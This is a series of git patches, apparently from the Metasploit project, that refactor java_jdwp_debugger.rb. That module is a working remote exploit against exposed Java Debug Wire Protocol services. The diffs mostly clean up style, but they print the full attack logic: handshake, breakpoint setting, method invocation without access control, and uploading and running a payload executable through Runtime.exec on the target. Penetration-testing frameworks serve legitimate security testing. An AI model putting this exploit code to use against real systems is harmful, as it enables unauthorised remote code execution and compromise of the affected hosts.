read_reply(datastore['RESPONSE_TIMEOUT']) - - formats = [ - ["I", "fieldid_size"], - ["I", "methodid_size"], - ["I", "objectid_size"], - ["I", "referencetypeid_size"], - ["I", "frameid_size"] - ] - entries = parse_entries(response, formats, false) - entries.each { |e| @vars.merge!(e) } - end # Gets the JDWP version implemented by the target VM def get_version - - sock.put(create_packet(VERSION_SIG)) - - response = read_reply(datastore['RESPONSE_TIMEOUT']) - formats = [ - ["S", "descr"], - ["I", "jdwp_major"], - ["I", "jdwp_minor"], - ["S", "vm_version"], - ["S", "vm_name"] + ["S", "descr"], + ["I", "jdwp_major"], + ["I", "jdwp_minor"], + ["S", "vm_version"], + ["S", "vm_name"] ] - + sock.put(create_packet(VERSION_SIG)) + response = read_reply(datastore['RESPONSE_TIMEOUT']) entries = parse_entries(response, formats, false) - entries.each { |e| @vars.merge!(e) } - end def version - return "#{@vars["vm_name"]} - #{@vars["vm_version"]}" + "#{@vars["vm_name"]} - #{@vars["vm_version"]}" end # Returns reference types for all classes currently loaded by the target VM def get_all_classes - return unless @classes.empty? - sock.put(create_packet(ALLCLASSES_SIG)) - - response = read_reply(datastore['RESPONSE_TIMEOUT']) - formats = [ - ["C", "reftype_tag"], - [@vars["referencetypeid_size"], "reftype_id"], - ["S", "signature"], - ["I", "status"] + ["C", "reftype_tag"], + [@vars["referencetypeid_size"], "reftype_id"], + ["S", "signature"], + ["I", "status"] ] - - print_status("#{peer} - Parsing list of classes...") - + sock.put(create_packet(ALLCLASSES_SIG)) + response = read_reply(datastore['RESPONSE_TIMEOUT']) @classes.append(parse_entries(response, formats)) - end # Checks if specified class is currently loaded by the target VM and returns it def get_class_by_name(name) - @classes.each do |entry_array| - entry_array.each do |entry| - - return entry if entry["signature"].downcase == name.downcase + if entry["signature"].downcase == name.downcase + return entry + end end end @@ -395,32 +376,24 @@ class Metasploit3 < Msf::Exploit::Remote # Returns information for each method in a reference type (ie. object). Inherited methods are not included. # The list of methods will include constructors (identified with the name "<init>") def get_methods(reftype_id) + if @methods.has_key?(reftype_id) + return @methods[reftype_id] + end - unless @methods.has_key?(reftype_id) - - refid = format(@vars["referencetypeid_size"],reftype_id) - - sock.put(create_packet(METHODS_SIG, refid)) - - response = read_reply(datastore['RESPONSE_TIMEOUT']) - - formats = [ + formats = [ [@vars["methodid_size"], "method_id"], ["S", "name"], ["S", "signature"], ["I", "mod_bits"] - ] - - @methods[reftype_id] = parse_entries(response, formats) - - end - - return @methods[reftype_id] + ] + ref_id = format(@vars["referencetypeid_size"],reftype_id) + sock.put(create_packet(METHODS_SIG, ref_id)) + response = read_reply(datastore['RESPONSE_TIMEOUT']) + @methods[reftype_id] = parse_entries(response, formats) end # Checks if specified method is currently loaded by the target VM and returns it def get_method_by_name(classname, name, signature = nil) - @methods[classname].each do |entry| if signature.nil? return entry if entry["name"].downcase == name.downcase @@ -435,27 +408,20 @@ class Metasploit3 < Msf::Exploit::Remote # Checks if specified class and method are currently loaded by the target VM and returns them def get_class_and_method(looked_class, looked_method, signature = nil) - target_class = get_class_by_name(looked_class) - fail_with(Failure::Unknown, "Class \"#{looked_class}\" not found") unless target_class get_methods(target_class["reftype_id"]) - target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature) - fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found") unless target_method return target_class, target_method - end # Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept") def str2fqclass(s) - i = s.rindex(".") - fail_with(Failure::BadConfig, 'Bad defined break class') unless i method = s[i+1..-1] # Subtr of s, from last '.' to the end of the string @@ -465,7 +431,6 @@ class Metasploit3 < Msf::Exploit::Remote classname << ';' return classname, method - end @@ -480,34 +445,25 @@ class Metasploit3 < Msf::Exploit::Remote # Sets an event request. When the event described by this request occurs, an event is sent from the target VM def send_event(event_code, args) - data = [event_code].pack('C') data << [SUSPEND_ALL].pack('C') data << [args.length].pack('N') args.each do |kind,option| - data << [kind].pack('C') data << option - end sock.put(create_packet(EVENTSET_SIG, data)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) - fail_with(Exploit::Failure::Unknown, "No network response") unless response - return response.unpack('N')[0] - end # Waits user defined time for an event sent from the target VM (or force event if possible) def wait_for_event - force_net_event unless datastore['BREAKPOINT_PORT'].nil? || (datastore['BREAKPOINT_PORT'] == 0) - buf = read_reply(datastore['BREAK_TIMEOUT']) return buf @@ -516,12 +472,8 @@ class Metasploit3 < Msf::Exploit::Remote # Force a network event for hitting breakpoint when object of debugging is a network app and break class is socket def force_net_event - print_status("#{peer} - Forcing network event over #{datastore['BREAKPOINT_PORT']}") - print_status("#{rhost}") - print_status("#{datastore['BREAKPOINT_PORT']}") - rex_socket = Rex::Socket::Tcp.create( 'PeerHost' => rhost, 'PeerPort' => datastore['BREAKPOINT_PORT'], @@ -531,23 +483,19 @@ class Metasploit3 < Msf::Exploit::Remote rex_socket.shutdown rex_socket.close - print_status("BYE force_net_event") end # Parses a received event and compares it with the expected def parse_event_breakpoint(buf, event_id) - r_id = buf[6..9].unpack('N')[0] return nil unless event_id == r_id len = @vars["objectid_size"] - t_id = unformat(len,buf[10..10+len-1]) return r_id, t_id - end @@ -555,9 +503,7 @@ class Metasploit3 < Msf::Exploit::Remote def clear_event(event_code, r_id) data = [event_code].pack('C') data << [r_id].pack('N') - sock.put(create_packet(EVENTCLEAR_SIG, data)) - read_reply(datastore['RESPONSE_TIMEOUT']) end @@ -565,78 +511,57 @@ class Metasploit3 < Msf::Exploit::Remote # Invokes a static method. The method must be member of the class type or one of its superclasses, # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. def invoke_static(class_id, thread_id, meth_id, args = []) - data = format(@vars["referencetypeid_size"], class_id) data << format(@vars["objectid_size"], thread_id) data << format(@vars["methodid_size"], meth_id) data << [args.length].pack('N') args.each do |arg| - data << arg data << [0].pack('N') - end sock.put(create_packet(INVOKESTATICMETHOD_SIG, data)) - buf = read_reply(datastore['RESPONSE_TIMEOUT']) - - return buf - + buf end # Invokes a instance method. The method must be member of the object's type or one of its superclasses, # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. def invoke(obj_id, thread_id, class_id, meth_id, args = []) - data = format(@vars["objectid_size"], obj_id) data << format(@vars["objectid_size"], thread_id) - data << format(@vars["referencetypeid_size"], class_id) - data << format(@vars["methodid_size"], meth_id) - data << [args.length].pack('N') args.each do |arg| - data << arg data << [0].pack('N') - end sock.put(create_packet(INVOKEMETHOD_SIG, data)) - buf = read_reply(datastore['RESPONSE_TIMEOUT']) - - return buf - + buf end # Creates a new object of specified class, invoking the specified constructor. The constructor method ID must be a member of the class type. def create_instance(class_id, thread_id, meth_id, args = []) - data = format(@vars["referencetypeid_size"], class_id) data << format(@vars["objectid_size"], thread_id) data << format(@vars["methodid_size"], meth_id) data << [args.length].pack('N') args.each do |arg| - data << arg data << [0].pack('N') - end sock.put(create_packet(CREATENEWINSTANCE_SIG, data)) - buf = read_reply(datastore['RESPONSE_TIMEOUT']) - - return buf - + buf end @@ -651,7 +576,6 @@ class Metasploit3 < Msf::Exploit::Remote # Configures payload according to targeted architecture def setup_payload - # 1. Setting up generic values. payload_exe = rand_text_alphanumeric(4 + rand(4)) pl_exe = generate_payload_exe @@ -668,199 +592,137 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, 'Unsupported target platform') end - return payload_exe, pl_exe end # Invokes java.lang.System.getProperty() for OS fingerprinting purposes def fingerprint_os(thread_id) - size = @vars["objectid_size"] # 1. Creates a string on target VM with the property to be getted cmd_obj_ids = create_string("os.name") - fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0 - cmd_obj_id = cmd_obj_ids[0]["obj_id"] # 2. Gets property data = [TAG_OBJECT].pack('C') data << format(size, cmd_obj_id) - data_array = [data] - runtime_class , runtime_meth = get_class_and_method("Ljava/lang/System;", "getProperty") - buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected String") unless buf[0] == [TAG_STRING].pack('C') str = unformat(size, buf[1..1+size-1]) - @os = solve_string(format(@vars["objectid_size"],str)) - end # Creates a file on the server given a execution thread def create_file(thread_id, filename) - cmd_obj_ids = create_string(filename) - fail_with(Failure::Unknown, "Failed to allocate string for filename") if cmd_obj_ids.length == 0 cmd_obj_id = cmd_obj_ids[0]["obj_id"] - size = @vars["objectid_size"] - data = [TAG_OBJECT].pack('C') data << format(size, cmd_obj_id) - data_array = [data] - runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "<init>", "(Ljava/lang/String;)V") - buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"], data_array) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') file = unformat(size, buf[1..1+size-1]) - fail_with(Failure::Unknown, "Failed to create file. Try to change the TMP_PATH") if file.nil? || (file == 0) register_files_for_cleanup(filename) - return file - + file end # Stores the payload on a new string created in target VM def upload_payload(thread_id, pl_exe) - size = @vars["objectid_size"] - runtime_class , runtime_meth = get_class_and_method("Lsun/misc/BASE64Decoder;", "<init>") - buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"]) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') decoder = unformat(size, buf[1..1+size-1]) - fail_with(Failure::Unknown, "Failed to create Base64 decoder object") if decoder.nil? || (decoder == 0) cmd_obj_ids = create_string("#{Rex::Text.encode_base64(pl_exe)}") - fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0 cmd_obj_id = cmd_obj_ids[0]["obj_id"] - data = [TAG_OBJECT].pack('C') data << format(size, cmd_obj_id) - data_array = [data] - runtime_class , runtime_meth = get_class_and_method("Lsun/misc/CharacterDecoder;", "decodeBuffer", "(Ljava/lang/String;)[B") - buf = invoke(decoder, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected ByteArray") unless buf[0] == [TAG_ARRAY].pack('C') pl = unformat(size, buf[1..1+size-1]) - - return pl - + pl end # Dumps the payload on a opened server file given a execution thread def dump_payload(thread_id, file, pl) - size = @vars["objectid_size"] - data = [TAG_OBJECT].pack('C') data << format(size, pl) - data_array = [data] - runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "write", "([B)V") - buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array) - fail_with(Failure::Unknown, "Exception ocurred when writing to file") unless buf[0] == [TAG_VOID].pack('C') - end # Closes a file on the server given a execution thread def close_file(thread_id, file) - size = @vars["objectid_size"] - runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "close") - buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"]) - fail_with(Failure::Unknown, "Exception ocurred when closing file") unless buf[0] == [TAG_VOID].pack('C') - end - # Executes a system command on target VM making use of java.lang.Runtime.exec() def execute_command(thread_id, cmd) - size = @vars["objectid_size"] # 1. Creates a string on target VM with the command to be executed cmd_obj_ids = create_string(cmd) - fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0 cmd_obj_id = cmd_obj_ids[0]["obj_id"] # 2. Gets Runtime context runtime_class , runtime_meth = get_class_and_method("Ljava/lang/Runtime;", "getRuntime") - buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"]) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') rt = unformat(size, buf[1..1+size-1]) - fail_with(Failure::Unknown, "Failed to invoke Runtime.getRuntime()") if rt.nil? || (rt == 0) # 3. Finds and executes "exec" method supplying the string with the command exec_meth = get_method_by_name(runtime_class["reftype_id"], "exec") - fail_with(Failure::BadConfig, "Cannot find method Runtime.exec()") if exec_meth.nil? data = [TAG_OBJECT].pack('C') data << format(size, cmd_obj_id) - data_array = [data] - buf = invoke(rt, thread_id, runtime_class["reftype_id"], exec_meth["method_id"], data_array) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') - end - # Sets a breakpoint on frequently called method (user-defined) def set_breakpoint - vprint_status("#{peer} - Setting breakpoint on class: #{datastore['BREAKPOINT']}") # 1. Gets reference of the method where breakpoint is going to be setted classname, method = str2fqclass(datastore['BREAKPOINT']) - break_class = get_class_by_name(classname) - fail_with(Failure::NotFound, "Could not access #{datastore['BREAKPOINT']}, probably is not used by the application") unless break_class get_methods(break_class["reftype_id"]) - m = get_method_by_name(break_class["reftype_id"], method) - fail_with(Failure::BadConfig, "Method of Break Class not found") unless m # 2. Sends event request for this method @@ -870,18 +732,15 @@ class Metasploit3 < Msf::Exploit::Remote loc << [0,0].pack('NN') data = [[MODKIND_LOCATIONONLY, loc]] - r_id = send_event(EVENT_BREAKPOINT, data) - fail_with(Failure::Unknown, "Could not set the breakpoint") unless r_id - return r_id + r_id end # Uploads & executes the payload on the target VM def exec_payload(thread_id) - # 0. Fingerprinting OS fingerprint_os(thread_id) @@ -909,12 +768,10 @@ class Metasploit3 < Msf::Exploit::Remote # 6. Executes the dumped payload cmd = "#{payload_exe}" execute_command(thread_id, cmd) - end def exploit - @my_id = 0x01 @vars = {} @classes = [] @@ -927,50 +784,43 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "#{peer} - JDWP Protocol not found") end - # 1. Get the sizes of variably-sized data types in the target VM - idsizes + print_status("#{peer} - Retriving the sizes of variable sized data types in the target VM...") + get_sizes - # 2. Get the version of the target VM + print_status("#{peer} - Getting the version of the target VM...") get_version - # 3. Get all currently loaded classes by the target VM + print_status("#{peer} - Getting all currently loaded classes by the target VM...") get_all_classes - # 4. Sets a breakpoint on frequently called method (user-defined) + print_status("#{peer} - Setting a breakpoint on #{datastore['BREAKPOINT']}...") r_id = set_breakpoint - # 5. Resume VM and wait for event + print_status("#{peer} - Resuming VM and waiting for an event...") resume_vm secs = datastore['BREAK_TIMEOUT'] - ret = "" - datastore['NUM_RETRIES'].times do |i| - print_status("#{peer} - Waiting for breakpoint hit #{i} during #{secs} seconds...") - buf = wait_for_event - ret = parse_event_breakpoint(buf, r_id) - break unless ret.nil? - end r_id, t_id = ret vprint_status("#{peer} - Received matching event from thread #{t_id}") - # 6. Clears event + print_status("#{peer} - Deleting breakpoint...") clear_event(EVENT_BREAKPOINT, r_id) - # 7. Drop & execute payload + print_status("#{peer} - Dropping and executing payload...") exec_payload(t_id) + print_status("#{peer} - Resuming the target VM...") resume_vm disconnect - end end From d184717e5507cf9bea1037cd1718659fb1c6a5bd Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 13:24:34 -0500 Subject: [PATCH 488/853] delete blank lines --- .../exploits/multi/misc/java_jdwp_debugger.rb | 39 +++---------------- 1 file changed, 5 insertions(+), 34 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 0b29ebe67c..fa68793ec2 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -143,85 +143,58 @@ class Metasploit3 < Msf::Exploit::Remote def peer - return "#{rhost}:#{rport}" + "#{rhost}:#{rport}" end # Establishes handshake with the server def handshake sock.put(HANDSHAKE) - return sock.get(datastore['RESPONSE_TIMEOUT']) end # Forges packet for JDWP protocol def create_packet(cmdsig, data="") flags = 0x00 - cmdset, cmd = cmdsig - pktlen = data.length + 11 - buf = [pktlen, @my_id, flags, cmdset, cmd] - pkt = buf.pack("NNCCC") - pkt << data - @my_id += 2 - - return pkt + pkt end # Reads packet response for JDWP protocol def read_reply(timeout) - response = sock.get(timeout) - fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response - pktlen,id,flags,errcode = response.unpack('NNCn') - response.slice!(0..10) - fail_with(Failure::Unknown, "Server sent error with code #{errcode}") if (errcode != 0) && (flags == REPLY_PACKET_TYPE) - - return response + response end # Returns the characters contained in the string defined in target VM def solve_string(data) - sock.put(create_packet(STRINGVALUE_SIG, data)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) - return "" unless response - return read_string(response) - end # Unpacks received string structure from the server response into a normal string def read_string(data) - data_len = data.unpack('N')[0] - data.slice!(0..3) - return data.slice!(0,data_len) - end # Creates a new string object in the target VM and returns its id def create_string(data) buf = build_string(data) - sock.put(create_packet(CREATESTRING_SIG, buf)) - buf = read_reply(datastore['RESPONSE_TIMEOUT']) - return parse_entries(buf, [[@vars['objectid_size'], "obj_id"]], false) - end # Packs normal string into string structure for target VM @@ -229,8 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote ret = [data.length].pack('N') ret << data - return ret - + ret end @@ -243,7 +215,6 @@ class Metasploit3 < Msf::Exploit::Remote end fail_with(Failure::Unknown, "Unknown format") - end # Unpack Fixnum from JDWP protocol @@ -304,7 +275,7 @@ class Metasploit3 < Msf::Exploit::Remote entries.append(data) end - return entries + entries end From 837668d083d9a429b500da376ce1101e160b0a15 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 13:48:53 -0500 Subject: [PATCH 489/853] use optiona argument for read_reply --- .../exploits/multi/misc/java_jdwp_debugger.rb | 30 +++++++++++-------- 1 file changed, 17 insertions(+), 13 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index fa68793ec2..2a901af23f 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -146,6 +146,10 @@ class Metasploit3 < Msf::Exploit::Remote "#{rhost}:#{rport}" end + def default_timeout + datastore['RESPONSE_TIMEOUT'] + end + # Establishes handshake with the server def handshake sock.put(HANDSHAKE) @@ -165,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Reads packet response for JDWP protocol - def read_reply(timeout) + def read_reply(timeout = default_timeout) response = sock.get(timeout) fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response pktlen,id,flags,errcode = response.unpack('NNCn') @@ -177,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote # Returns the characters contained in the string defined in target VM def solve_string(data) sock.put(create_packet(STRINGVALUE_SIG, data)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) + response = read_reply return "" unless response return read_string(response) end @@ -193,7 +197,7 @@ class Metasploit3 < Msf::Exploit::Remote def create_string(data) buf = build_string(data) sock.put(create_packet(CREATESTRING_SIG, buf)) - buf = read_reply(datastore['RESPONSE_TIMEOUT']) + buf = read_reply return parse_entries(buf, [[@vars['objectid_size'], "obj_id"]], false) end @@ -289,7 +293,7 @@ class Metasploit3 < Msf::Exploit::Remote ["I", "frameid_size"] ] sock.put(create_packet(IDSIZES_SIG)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) + response = read_reply entries = parse_entries(response, formats, false) entries.each { |e| @vars.merge!(e) } end @@ -305,7 +309,7 @@ class Metasploit3 < Msf::Exploit::Remote ["S", "vm_name"] ] sock.put(create_packet(VERSION_SIG)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) + response = read_reply entries = parse_entries(response, formats, false) entries.each { |e| @vars.merge!(e) } end @@ -327,7 +331,7 @@ class Metasploit3 < Msf::Exploit::Remote ["I", "status"] ] sock.put(create_packet(ALLCLASSES_SIG)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) + response = read_reply @classes.append(parse_entries(response, formats)) end @@ -359,7 +363,7 @@ class Metasploit3 < Msf::Exploit::Remote ] ref_id = format(@vars["referencetypeid_size"],reftype_id) sock.put(create_packet(METHODS_SIG, ref_id)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) + response = read_reply @methods[reftype_id] = parse_entries(response, formats) end @@ -408,7 +412,7 @@ class Metasploit3 < Msf::Exploit::Remote # Resumes execution of the application after the suspend command or an event has stopped it def resume_vm sock.put(create_packet(RESUMEVM_SIG)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) + response = read_reply fail_with(Exploit::Failure::Unknown, "No network response") unless response end @@ -426,7 +430,7 @@ class Metasploit3 < Msf::Exploit::Remote end sock.put(create_packet(EVENTSET_SIG, data)) - response = read_reply(datastore['RESPONSE_TIMEOUT']) + response = read_reply fail_with(Exploit::Failure::Unknown, "No network response") unless response return response.unpack('N')[0] end @@ -475,7 +479,7 @@ class Metasploit3 < Msf::Exploit::Remote data = [event_code].pack('C') data << [r_id].pack('N') sock.put(create_packet(EVENTCLEAR_SIG, data)) - read_reply(datastore['RESPONSE_TIMEOUT']) + read_reply end @@ -493,7 +497,7 @@ class Metasploit3 < Msf::Exploit::Remote end sock.put(create_packet(INVOKESTATICMETHOD_SIG, data)) - buf = read_reply(datastore['RESPONSE_TIMEOUT']) + buf = read_reply buf end @@ -513,7 +517,7 @@ class Metasploit3 < Msf::Exploit::Remote end sock.put(create_packet(INVOKEMETHOD_SIG, data)) - buf = read_reply(datastore['RESPONSE_TIMEOUT']) + buf = read_reply buf end @@ -531,7 +535,7 @@ class Metasploit3 < Msf::Exploit::Remote end sock.put(create_packet(CREATENEWINSTANCE_SIG, data)) - buf = read_reply(datastore['RESPONSE_TIMEOUT']) + buf = read_reply buf end From 6c643f8837c2433c27c44a1f973e764688366308 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 14:14:23 -0500 Subject: [PATCH 490/853] Fix usage of Rex::Sockket::Tcp --- .../exploits/multi/misc/java_jdwp_debugger.rb | 36 ++++++++++++------- 1 file changed, 23 insertions(+), 13 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 2a901af23f..b645c29a5e 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -113,7 +113,6 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(8000), - OptInt.new('STATUS_EVERY', [true, 'How many iterations until status', 1000]), OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]), OptString.new('TMP_PATH', [ false, 'A directory where we can write files. Ensure there is a trailing slash']), OptString.new('BREAKPOINT', [ true, 'Frequently called method for setting breakpoint', 'java.net.ServerSocket.accept' ]), @@ -172,9 +171,11 @@ class Metasploit3 < Msf::Exploit::Remote def read_reply(timeout = default_timeout) response = sock.get(timeout) fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") unless response - pktlen,id,flags,errcode = response.unpack('NNCn') + pktlen, id, flags, errcode = response.unpack('NNCn') response.slice!(0..10) - fail_with(Failure::Unknown, "Server sent error with code #{errcode}") if (errcode != 0) && (flags == REPLY_PACKET_TYPE) + if errcode != 0 && flags == REPLY_PACKET_TYPE + fail_with(Failure::Unknown, "#{peer} - Server sent error with code #{errcode}") + end response end @@ -245,15 +246,17 @@ class Metasploit3 < Msf::Exploit::Remote nb_entries.times do |var| - print_status("#{peer} - #{Time.now.getutc} - Parsed #{var} classes of #{nb_entries}") if var != 0 && var % datastore['STATUS_EVERY'] == 0 + if var != 0 && var % 1000 == 0 + vprint_status("#{peer} - Parsed #{var} classes of #{nb_entries}") + end data = {} formats.each do |fmt,name| - if fmt == "L" or fmt == 8 + if fmt == "L" || fmt == 8 data[name] = buf.unpack('Q>')[0] buf.slice!(0..7) - elsif fmt == "I" or fmt == 4 + elsif fmt == "I" || fmt == 4 data[name] = buf.unpack('N')[0] buf.slice!(0..3) elsif fmt == "S" @@ -431,7 +434,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(create_packet(EVENTSET_SIG, data)) response = read_reply - fail_with(Exploit::Failure::Unknown, "No network response") unless response + fail_with(Exploit::Failure::Unknown, "#{peer} - No network response") unless response return response.unpack('N')[0] end @@ -450,14 +453,21 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Forcing network event over #{datastore['BREAKPOINT_PORT']}") rex_socket = Rex::Socket::Tcp.create( - 'PeerHost' => rhost, - 'PeerPort' => datastore['BREAKPOINT_PORT'], + 'PeerHost' => rhost, + 'PeerPort' => datastore['BREAKPOINT_PORT'] ) + add_socket(rex_socket) + rex_socket.put("GET / HTTP/1.0\r\n\r\n") - rex_socket.shutdown - rex_socket.close + begin + rex_socket.shutdown + rex_socket.close + rescue IOError + end + + remove_socket(rex_socket) end @@ -756,7 +766,7 @@ class Metasploit3 < Msf::Exploit::Remote connect unless handshake == HANDSHAKE - fail_with(Failure::NotVulnerable, "#{peer} - JDWP Protocol not found") + fail_with(Failure::NotVulnerable, "JDWP Protocol not found") end print_status("#{peer} - Retriving the sizes of variable sized data types in the target VM...") @@ -793,7 +803,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Dropping and executing payload...") exec_payload(t_id) - print_status("#{peer} - Resuming the target VM...") + print_status("#{peer} - Resuming the target VM, just in case...") resume_vm disconnect From 77eeb5209a3d404c4585ca646e4eb4f41264ce55 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 14:23:21 -0500 Subject: [PATCH 491/853] Do small cleanups --- .../exploits/multi/misc/java_jdwp_debugger.rb | 82 +++++++++++-------- 1 file changed, 49 insertions(+), 33 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index b645c29a5e..aefb7c55ae 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -328,10 +328,10 @@ class Metasploit3 < Msf::Exploit::Remote return unless @classes.empty? formats = [ - ["C", "reftype_tag"], - [@vars["referencetypeid_size"], "reftype_id"], - ["S", "signature"], - ["I", "status"] + ["C", "reftype_tag"], + [@vars["referencetypeid_size"], "reftype_id"], + ["S", "signature"], + ["I", "status"] ] sock.put(create_packet(ALLCLASSES_SIG)) response = read_reply @@ -376,14 +376,15 @@ class Metasploit3 < Msf::Exploit::Remote if signature.nil? return entry if entry["name"].downcase == name.downcase else - return entry if (entry["name"].downcase == name.downcase) && (entry["signature"].downcase == signature.downcase) + if entry["name"].downcase == name.downcase && entry["signature"].downcase == signature.downcase + return entry + end end end nil end - # Checks if specified class and method are currently loaded by the target VM and returns them def get_class_and_method(looked_class, looked_method, signature = nil) target_class = get_class_by_name(looked_class) @@ -396,7 +397,6 @@ class Metasploit3 < Msf::Exploit::Remote return target_class, target_method end - # Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept") def str2fqclass(s) i = s.rindex(".") @@ -411,7 +411,6 @@ class Metasploit3 < Msf::Exploit::Remote return classname, method end - # Resumes execution of the application after the suspend command or an event has stopped it def resume_vm sock.put(create_packet(RESUMEVM_SIG)) @@ -420,7 +419,6 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Exploit::Failure::Unknown, "No network response") unless response end - # Sets an event request. When the event described by this request occurs, an event is sent from the target VM def send_event(event_code, args) data = [event_code].pack('C') @@ -438,7 +436,6 @@ class Metasploit3 < Msf::Exploit::Remote return response.unpack('N')[0] end - # Waits user defined time for an event sent from the target VM (or force event if possible) def wait_for_event force_net_event unless datastore['BREAKPOINT_PORT'].nil? || (datastore['BREAKPOINT_PORT'] == 0) @@ -447,7 +444,6 @@ class Metasploit3 < Msf::Exploit::Remote return buf end - # Force a network event for hitting breakpoint when object of debugging is a network app and break class is socket def force_net_event print_status("#{peer} - Forcing network event over #{datastore['BREAKPOINT_PORT']}") @@ -470,7 +466,6 @@ class Metasploit3 < Msf::Exploit::Remote remove_socket(rex_socket) end - # Parses a received event and compares it with the expected def parse_event_breakpoint(buf, event_id) r_id = buf[6..9].unpack('N')[0] @@ -483,7 +478,6 @@ class Metasploit3 < Msf::Exploit::Remote return r_id, t_id end - # Clear a defined event request def clear_event(event_code, r_id) data = [event_code].pack('C') @@ -492,7 +486,6 @@ class Metasploit3 < Msf::Exploit::Remote read_reply end - # Invokes a static method. The method must be member of the class type or one of its superclasses, # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. def invoke_static(class_id, thread_id, meth_id, args = []) @@ -511,7 +504,6 @@ class Metasploit3 < Msf::Exploit::Remote buf end - # Invokes a instance method. The method must be member of the object's type or one of its superclasses, # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. def invoke(obj_id, thread_id, class_id, meth_id, args = []) @@ -531,7 +523,6 @@ class Metasploit3 < Msf::Exploit::Remote buf end - # Creates a new object of specified class, invoking the specified constructor. The constructor method ID must be a member of the class type. def create_instance(class_id, thread_id, meth_id, args = []) data = format(@vars["referencetypeid_size"], class_id) @@ -549,7 +540,6 @@ class Metasploit3 < Msf::Exploit::Remote buf end - def temp_path return nil unless datastore['TMP_PATH'] unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\') @@ -558,7 +548,6 @@ class Metasploit3 < Msf::Exploit::Remote datastore['TMP_PATH'] end - # Configures payload according to targeted architecture def setup_payload # 1. Setting up generic values. @@ -623,19 +612,24 @@ class Metasploit3 < Msf::Exploit::Remote file end - # Stores the payload on a new string created in target VM def upload_payload(thread_id, pl_exe) size = @vars["objectid_size"] runtime_class , 